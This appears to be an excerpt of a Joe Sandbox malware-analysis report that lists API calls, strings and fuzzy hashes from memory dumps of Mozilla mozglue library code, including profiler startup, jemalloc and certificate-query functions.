                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                              • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                              • API String ID: 3686969729-1266492768
                                              • Opcode ID: ffe39d2bc8055325bad58ee21604f0cfaf570aef79576153f2bf928493efcff3
                                              • Instruction ID: 091bd5713851a6944659a2363b7c4a6319c05b9b3a3bfb0bc1db15b811fce999
                                              • Opcode Fuzzy Hash: ffe39d2bc8055325bad58ee21604f0cfaf570aef79576153f2bf928493efcff3
                                              • Instruction Fuzzy Hash: 1A22F5B0A047009BD700FF748C68E5A7BB4EF8634DF168629E85997B41EF30A859CB57
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50B845
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000), ref: 6C50B852
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50B884
                                              • InitializeConditionVariable.KERNEL32(?), ref: 6C50B8D2
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C50B9FD
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50BA05
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000), ref: 6C50BA12
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,00000000), ref: 6C50BA27
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50BA4B
                                              • free.MOZGLUE(?), ref: 6C50C9C7
                                              • free.MOZGLUE(?), ref: 6C50C9DC
                                              Strings
                                              • [I %d/%d] Stack sample too big for profiler storage, needed %u bytes, xrefs: 6C50C878
                                              • [I %d/%d] Stack sample too big for local storage, needed %u bytes, xrefs: 6C50C7DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                              • String ID: [I %d/%d] Stack sample too big for local storage, needed %u bytes$[I %d/%d] Stack sample too big for profiler storage, needed %u bytes
                                              • API String ID: 656605770-2789026554
                                              • Opcode ID: 7f364218ea66902705fe4ec691e476284ee039c2c1c551552faa8541993b6a26
                                              • Instruction ID: 9d4fd742274f9a22d9379e1dff0db0f5a8c3140603685dd0e472b79525957a5a
                                              • Opcode Fuzzy Hash: 7f364218ea66902705fe4ec691e476284ee039c2c1c551552faa8541993b6a26
                                              • Instruction Fuzzy Hash: 63A28E71A087808FC725DF28C890B9BB7E5BFC9314F058A2DE899D7750DB71A905CB92
                                              APIs
                                              • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C4D6CCC
                                              • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C4D6D11
                                              • moz_xmalloc.MOZGLUE(0000000C), ref: 6C4D6D26
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C4D6D35
                                              • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C4D6D53
                                              • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C4D6D73
                                              • free.MOZGLUE(00000000), ref: 6C4D6D80
                                              • CertGetNameStringW.CRYPT32 ref: 6C4D6DC0
                                              • moz_xmalloc.MOZGLUE(00000000), ref: 6C4D6DDC
                                              • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C4D6DEB
                                              • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C4D6DFF
                                              • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C4D6E10
                                              • CryptMsgClose.CRYPT32(00000000), ref: 6C4D6E27
                                              • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C4D6E34
                                              • CreateFileW.KERNEL32 ref: 6C4D6EF9
                                              • moz_xmalloc.MOZGLUE(00000000), ref: 6C4D6F7D
                                              • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C4D6F8C
                                              • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C4D709D
                                              • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C4D7103
                                              • free.MOZGLUE(00000000), ref: 6C4D7153
                                              • CloseHandle.KERNEL32(?), ref: 6C4D7176
                                              • __Init_thread_footer.LIBCMT ref: 6C4D7209
                                              • __Init_thread_footer.LIBCMT ref: 6C4D723A
                                              • __Init_thread_footer.LIBCMT ref: 6C4D726B
                                              • __Init_thread_footer.LIBCMT ref: 6C4D729C
                                              • __Init_thread_footer.LIBCMT ref: 6C4D72DC
                                              • __Init_thread_footer.LIBCMT ref: 6C4D730D
                                              • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C4D73C2
                                              • VerSetConditionMask.NTDLL ref: 6C4D73F3
                                              • VerSetConditionMask.NTDLL ref: 6C4D73FF
                                              • VerSetConditionMask.NTDLL ref: 6C4D7406
                                              • VerSetConditionMask.NTDLL ref: 6C4D740D
                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C4D741A
                                              • moz_xmalloc.MOZGLUE(?), ref: 6C4D755A
                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4D7568
                                              • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C4D7585
                                              • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C4D7598
                                              • free.MOZGLUE(00000000), ref: 6C4D75AC
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                              • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                              • API String ID: 3256780453-3980470659
                                              • Opcode ID: f0e47c8404540bda831d159a09e4cd743f575a1492efac6bd41cf5c9b6fb2feb
                                              • Instruction ID: b61618143bdbd1cd27105030399f534710684ec7223640d40f474347b0cf91fe
                                              • Opcode Fuzzy Hash: f0e47c8404540bda831d159a09e4cd743f575a1492efac6bd41cf5c9b6fb2feb
                                              • Instruction Fuzzy Hash: A052FA71A042159BEB21EF24CC94F9A77B8EF85308F128599E5099B740DB70BF85CF91
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E7DC), ref: 6C4F7019
                                              • LeaveCriticalSection.KERNEL32(6C54E7DC), ref: 6C4F7061
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C4F71A4
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4F721D
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C4F723E
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C4F726C
                                              • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C4F72B2
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4F733F
                                              • EnterCriticalSection.KERNEL32(0000000C), ref: 6C4F73E8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4F961C
                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4F9622
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4F9642
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4F964F
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4F96CE
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4F96DB
                                              • AcquireSRWLockExclusive.KERNEL32(6C54E804), ref: 6C4F9747
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4F9792
                                              • __Init_thread_footer.LIBCMT ref: 6C4F97A5
                                              • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C54E810,00000040), ref: 6C4F97CF
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7B8,00001388), ref: 6C4F9838
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E744,00001388), ref: 6C4F984E
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E784,00001388), ref: 6C4F9874
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7DC,00001388), ref: 6C4F9895
                                              Strings
                                              • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C4F99A8
                                              • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C4F9993
                                              • : (malloc) Unsupported character in malloc options: ', xrefs: 6C4F9BF4
                                              • MOZ_CRASH(), xrefs: 6C4F9B42
                                              • Compile-time page size does not divide the runtime one., xrefs: 6C4F9B38
                                              • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C4F9933, 6C4F9A33, 6C4F9A4E
                                              • <jemalloc>, xrefs: 6C4F9B33, 6C4F9BE3
                                              • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C4F99D2
                                              • MALLOC_OPTIONS, xrefs: 6C4F97CA
                                              • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C4F99BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                              • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 4047164644-4173974723
                                              • Opcode ID: de82d6e94b6f21eb41ee8504201c141befc97d583f955a8025dc9ca9228c1b97
                                              • Instruction ID: ddea187dd2f57193d2860d0be045a837a1eb23bd9dac4b3172d921d9550a064e
                                              • Opcode Fuzzy Hash: de82d6e94b6f21eb41ee8504201c141befc97d583f955a8025dc9ca9228c1b97
                                              • Instruction Fuzzy Hash: A4533C71A097018FD714CF29C980E15BBE1BFC6328F29C66DE8698B791D775E842CB81
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C500F1F
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C500F99
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C500FB7
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C500FE9
                                              • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C501031
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C5010D0
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C50117D
                                              • memset.VCRUNTIME140(?,000000E5,?), ref: 6C501C39
                                              • EnterCriticalSection.KERNEL32(6C54E744), ref: 6C503391
                                              • LeaveCriticalSection.KERNEL32(6C54E744), ref: 6C5033CD
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C503431
                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C503437
                                              Strings
                                              • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C5037A8
                                              • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C503793
                                              • : (malloc) Unsupported character in malloc options: ', xrefs: 6C503A02
                                              • MOZ_CRASH(), xrefs: 6C503950
                                              • Compile-time page size does not divide the runtime one., xrefs: 6C503946
                                              • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C503559, 6C50382D, 6C503848
                                              • <jemalloc>, xrefs: 6C503941, 6C5039F1
                                              • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C5037D2
                                              • MALLOC_OPTIONS, xrefs: 6C5035FE
                                              • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C5037BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                              • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 3040639385-4173974723
                                              • Opcode ID: 914d8a64e5cd7748aefecb5396f1b3563f8b3cc6e1a059883f04dc55dde40c82
                                              • Instruction ID: a7ffcd4ab6c79fbd245b1de2fc66bc22b1a99da7bee2c7085b001596799961fb
                                              • Opcode Fuzzy Hash: 914d8a64e5cd7748aefecb5396f1b3563f8b3cc6e1a059883f04dc55dde40c82
                                              • Instruction Fuzzy Hash: 9F534A71B056018FD704CF29C950A16FBE1BF89328F29C6ADE869DB7A1D771E841CB81
                                              APIs
                                              • LoadLibraryW.KERNEL32(user32,?,6C4FE1A5), ref: 6C525606
                                              • LoadLibraryW.KERNEL32(gdi32,?,6C4FE1A5), ref: 6C52560F
                                              • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C525633
                                              • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C52563D
                                              • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C52566C
                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C52567D
                                              • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C525696
                                              • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C5256B2
                                              • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C5256CB
                                              • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C5256E4
                                              • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C5256FD
                                              • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C525716
                                              • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C52572F
                                              • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C525748
                                              • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C525761
                                              • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C52577A
                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C525793
                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C5257A8
                                              • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C5257BD
                                              • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C5257D5
                                              • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C5257EA
                                              • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C5257FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                              • API String ID: 2238633743-1964193996
                                              • Opcode ID: 021764d59de139c786e55d0e60f817fdbd98e42de3f4894568fb4df59b011e5f
                                              • Instruction ID: 79fed7624457183189462d0b41b5067ef61a68c7b980a6223069b472f6f536d1
                                              • Opcode Fuzzy Hash: 021764d59de139c786e55d0e60f817fdbd98e42de3f4894568fb4df59b011e5f
                                              • Instruction Fuzzy Hash: 945143706017129BDB00BF398D48D6B3AF8EB463497A2D525E911E3A46EB78C8108F68
                                              APIs
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523527
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52355B
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5235BC
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5235E0
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52363A
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523693
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5236CD
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523703
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52373C
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523775
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52378F
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523892
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5238BB
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523902
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523939
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523970
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5239EF
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523A26
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523AE5
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523E85
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523EBA
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C523EE2
                                                • Part of subcall function 6C526180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C5261DD
                                                • Part of subcall function 6C526180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C52622C
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5240F9
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52412F
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C524157
                                                • Part of subcall function 6C526180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C526250
                                                • Part of subcall function 6C526180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C526292
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C52441B
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C524448
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C52484E
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C524863
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C524878
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C524896
                                              • free.MOZGLUE ref: 6C52489F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: floor$free$malloc$memcpy
                                              • String ID:
                                              • API String ID: 3842999660-3916222277
                                              • Opcode ID: 50245fa8bd8e61b87d20120a7a0f8bcbabc5ffd1bbfe2b48f53a97efc5be426a
                                              • Instruction ID: f9399e2f8f7bf6b1da3a09a3de39b7d175ac4f754b1b2a35faf07ce5045d0463
                                              • Opcode Fuzzy Hash: 50245fa8bd8e61b87d20120a7a0f8bcbabc5ffd1bbfe2b48f53a97efc5be426a
                                              • Instruction Fuzzy Hash: 55F23A74908B808FC725CF28C48469AFBF1FFC9358F118A5ED99997751DB31A886CB42
                                              APIs
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C50F09B
                                                • Part of subcall function 6C4E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B85
                                                • Part of subcall function 6C4E5B50: EnterCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B90
                                                • Part of subcall function 6C4E5B50: LeaveCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5BD8
                                                • Part of subcall function 6C4E5B50: GetTickCount64.KERNEL32 ref: 6C4E5BE4
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C50F0AC
                                                • Part of subcall function 6C4E5C50: GetTickCount64.KERNEL32 ref: 6C4E5D40
                                                • Part of subcall function 6C4E5C50: EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4E5D67
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C50F0BE
                                                • Part of subcall function 6C4E5C50: __aulldiv.LIBCMT ref: 6C4E5DB4
                                                • Part of subcall function 6C4E5C50: LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4E5DED
                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C50F155
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F1E0
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F1ED
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F212
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F229
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F231
                                              • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C50F248
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F2AE
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F2BB
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F2F8
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
